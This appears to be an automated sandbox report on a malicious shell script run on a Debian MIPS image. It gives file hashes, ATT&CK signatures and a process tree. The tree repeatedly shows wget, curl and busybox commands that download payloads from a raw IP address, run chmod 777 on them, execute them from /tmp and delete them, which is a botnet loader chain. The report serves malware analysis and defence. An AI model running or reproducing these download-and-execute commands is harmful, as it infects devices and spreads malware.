Analysis
-
max time kernel
67s -
max time network
71s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipsel image:debian9-mipsel-20240611-en kernel:4.9.0-13-4kc-malta locale:en-us os:debian-9-mipsel system -
submitted
28/10/2024, 02:45
Static task
static1
Behavioral task
behavioral1
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh
-
Size
10KB
-
MD5
213cb7829c8f2673d0e3a75ed6639e13
-
SHA1
3daec954fef9c3751e7ce17a5d90672ccaf98608
-
SHA256
7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17
-
SHA512
b8be68bfce37af24db9820d6960f1a66a43e4822dff463d9d5a485644d38ba72c7556113c1f4884d0c87fbf4bf318833208844059dcbb8b998dc6cf8e29554c4
-
SSDEEP
192:UouKo0b2Oyw0Iz0sbES+ssW5dw/3vUfDp5dw/3jrS+sFfDzPo0b2Ov0Iz0sl:UoGw0Iz0sbES+ssW5dw/3m5dw/3nS+s/
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process
739 chmod
768 chmod
937 chmod
973 chmod
901 chmod
925 chmod
931 chmod
955 chmod
843 chmod
889 chmod
967 chmod
979 chmod
751 chmod
814 chmod
820 chmod
883 chmod
919 chmod
745 chmod
802 chmod
943 chmod
961 chmod
865 chmod
871 chmod
949 chmod
877 chmod
895 chmod
907 chmod
913 chmod
-
Executes dropped EXE 28 IoCs
-
description ioc Process
File opened for reading /proc/sys/crypto/fips_enabled curl
-
System Network Configuration Discovery 1 TTPs 10 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process
909 rm
904 wget
887 curl
888 busybox
890 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn
891 rm
905 curl
906 busybox
908 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn
886 wget
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh/tmp/7463e8056474aaf11d48314134cd8520144395dd1aaf693b466bbc79c0b8ea17.sh1⤵PID:707
-
/bin/rm/bin/rm bins.sh2⤵PID:710
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:716
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:729
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:737
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:739
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:740
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:741
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:742
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:743
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:744
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:745
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:746
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:747
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:748
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:749
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:750
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:752
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:753
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:754
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:755
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:762
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:768
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:769
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:786
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:795
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:802
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:804
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:806
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:812
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:813
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:814
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:815
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:816
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:817
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:818
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:819
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:820
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:821
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:822
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:823
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:828
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:837
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:845
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:848
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:850
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:857
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:864
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:865
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:866
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:867
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:868
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:869
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:870
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:871
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:872
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:873
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:874
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:875
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:876
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:877
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:878
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:879
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:880
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:881
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:882
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:883
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:884
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:885
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:886
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:887
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:888
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:889
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:890
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:891
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:892
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:893
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:894
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:895
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:896
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:897
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:898
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:899
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:900
-
-
/bin/chmodchmod 777 zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- File and Directory Permissions Modification
PID:901
-
-
/tmp/zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj./zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵
- Executes dropped EXE
PID:902
-
-
/bin/rmrm zZFokRIrZi4thgyos9s4ZQXytXCziIy0tj2⤵PID:903
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:904
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:905
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:906
-
-
/bin/chmodchmod 777 TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- File and Directory Permissions Modification
PID:907
-
-
/tmp/TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn./TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:908
-
-
/bin/rmrm TTdQXSsS6OZC3chipRm15yMjiW7QXSMnhn2⤵
- System Network Configuration Discovery
PID:909
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:910
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Reads runtime system information
- Writes file to tmp directory
PID:911
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:912
-
-
/bin/chmodchmod 777 LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- File and Directory Permissions Modification
PID:913
-
-
/tmp/LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg9./LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵
- Executes dropped EXE
PID:914
-
-
/bin/rmrm LAgx3DJIt9jfe6TGYsjlLjXeywJaStEgg92⤵PID:915
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:916
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:917
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:918
-
-
/bin/chmodchmod 777 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- File and Directory Permissions Modification
PID:919
-
-
/tmp/1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v7./1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵
- Executes dropped EXE
PID:920
-
-
/bin/rmrm 1X2n0PJFoCHU7evlMB0GhHOtqm1ALdP3v72⤵PID:921
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:922
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Reads runtime system information
- Writes file to tmp directory
PID:923
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:924
-
-
/bin/chmodchmod 777 GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- File and Directory Permissions Modification
PID:925
-
-
/tmp/GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD0./GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵
- Executes dropped EXE
PID:926
-
-
/bin/rmrm GjanfnBK0Wzei92emyrPnYPSQrZo7cvLD02⤵PID:927
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:928
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:929
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:930
-
-
/bin/chmodchmod 777 eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- File and Directory Permissions Modification
PID:931
-
-
/tmp/eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne./eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵
- Executes dropped EXE
PID:932
-
-
/bin/rmrm eeO2J60ZgEr3HtHiTGahECLhoA9h10fvne2⤵PID:933
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:934
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:935
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:936
-
-
/bin/chmodchmod 777 r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- File and Directory Permissions Modification
PID:937
-
-
/tmp/r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB./r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵
- Executes dropped EXE
PID:938
-
-
/bin/rmrm r3AB3DZPohrunc9Z1nYZMEA0GQWdsEPLsB2⤵PID:939
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:940
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:941
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:942
-
-
/bin/chmodchmod 777 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- File and Directory Permissions Modification
PID:943
-
-
/tmp/9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM./9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵
- Executes dropped EXE
PID:944
-
-
/bin/rmrm 9jDzMCltEvqSnDCJTh6s3LqijNWccznaiM2⤵PID:945
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:946
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:947
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:948
-
-
/bin/chmodchmod 777 rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- File and Directory Permissions Modification
PID:949
-
-
/tmp/rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ7./rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵
- Executes dropped EXE
PID:950
-
-
/bin/rmrm rXqWqRIofZXtzYEyLCxjvaSBrKUwm9JXZ72⤵PID:951
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:952
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:953
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:954
-
-
/bin/chmodchmod 777 GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- File and Directory Permissions Modification
PID:955
-
-
/tmp/GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn./GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵
- Executes dropped EXE
PID:956
-
-
/bin/rmrm GrAHvby46Yxoptw7NaP57JXfMOXHzWjTTn2⤵PID:957
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:958
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Reads runtime system information
- Writes file to tmp directory
PID:959
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:960
-
-
/bin/chmodchmod 777 MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- File and Directory Permissions Modification
PID:961
-
-
/tmp/MZGoABrnYnFu8Xp27oQs69simaihhOZfI7./MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵
- Executes dropped EXE
PID:962
-
-
/bin/rmrm MZGoABrnYnFu8Xp27oQs69simaihhOZfI72⤵PID:963
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:964
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:965
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:966
-
-
/bin/chmodchmod 777 O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI./O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm O3r3ShnHrR6RPOf4YhRsuYsNZ6uiLWQgjI2⤵PID:969
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:970
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:972
-
-
/bin/chmodchmod 777 eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- File and Directory Permissions Modification
PID:973
-
-
/tmp/eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy./eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵
- Executes dropped EXE
PID:974
-
-
/bin/rmrm eAQDy98j1OXJwYsPfyk3HMWXbPSVMXQuHy2⤵PID:975
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:976
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:977
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:978
-
-
/bin/chmodchmod 777 QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- File and Directory Permissions Modification
PID:979
-
-
/tmp/QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H./QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵
- Executes dropped EXE
PID:980
-
-
/bin/rmrm QOWaBPaFXxxEbH6HUsnDLzescy01iCqI6H2⤵PID:981
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5
998368d7c95ea4293237f2320546e440
SHA1
30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256
533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512
648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97